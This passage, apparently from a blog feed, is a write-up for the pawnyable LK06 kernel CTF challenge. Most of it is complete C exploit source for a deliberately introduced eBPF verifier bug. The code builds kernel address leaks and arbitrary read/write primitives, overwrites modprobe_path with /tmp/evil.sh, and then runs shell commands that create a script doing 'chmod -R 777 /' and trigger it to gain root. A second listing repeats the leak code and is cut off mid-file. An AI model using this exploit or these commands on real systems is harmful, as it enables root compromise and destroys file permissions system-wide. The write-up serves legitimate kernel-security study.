  printf(&amp;#34;[+] jit_addr: 0x%016lx\n&amp;#34;, jit_addr);

  get_enter_to_continue(&amp;#34;Press enter to exit(cause kernel crash)...&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2 id=&#34;refernece&#34;&gt;Refernece&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/ebpf.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/verifier.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&#34;&gt;https://pawnyable.cafe/linux-kernel/LK06/exploit.html&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description>
      <content>&lt;hr&gt;
&lt;h2 id=&#34;lk06-brahman&#34;&gt;LK06: Brahman&lt;/h2&gt;
&lt;h3 id=&#34;exploit-using-adjust_ptr_min_max_vals&#34;&gt;Exploit using adjust_ptr_min_max_vals&lt;/h3&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;149628537&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;149628537&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;exploit.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf(&amp;#34;[+] kernel_base: 0x%016lx\n&amp;#34;, kernel_base);

  const char* new_modprobe = &amp;#34;/tmp/evil.sh&amp;#34;;
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf(&amp;#34;[*] Overwrite modprobe to %s\n&amp;#34;, new_modprobe);
  for (size_t i = 0; i &amp;lt; new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open(&amp;#34;/proc/sys/kernel/modprobe&amp;#34;, O_RDONLY);
    if (fd &amp;lt; 0) {
      fatal(&amp;#34;open(/proc/sys/kernel/modprobe)&amp;#34;);
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf(&amp;#34;[*] new modprobe: %s\n&amp;#34;, modprobe);
      puts(&amp;#34;[-] Failed to overwrite modprobe&amp;#34;);
      return -1;
    }
    puts(&amp;#34;[+] Successfully overwritten modprobe&amp;#34;);
  }

  puts(&amp;#34;[+] Get root&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;#!/bin/sh\nchmod -R 777 /&amp;#39; &amp;gt; /tmp/evil.sh&amp;#34;);
  system(&amp;#34;chmod +x /tmp/evil.sh&amp;#34;);
  system(&amp;#34;echo -e &amp;#39;\xde\xad\xbe\xef&amp;#39; &amp;gt; /tmp/pwn&amp;#34;);
  system(&amp;#34;chmod +x /tmp/pwn&amp;#34;);
  system(&amp;#34;/tmp/pwn&amp;#34;);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h3 id=&#34;leaks&#34;&gt;Leaks&lt;/h3&gt;
&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using &lt;code&gt;adjust_ptr_min_max_vals&lt;/code&gt;&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;546928317&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;546928317&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_adjust_ptr_min_max_vals.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &amp;amp;val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
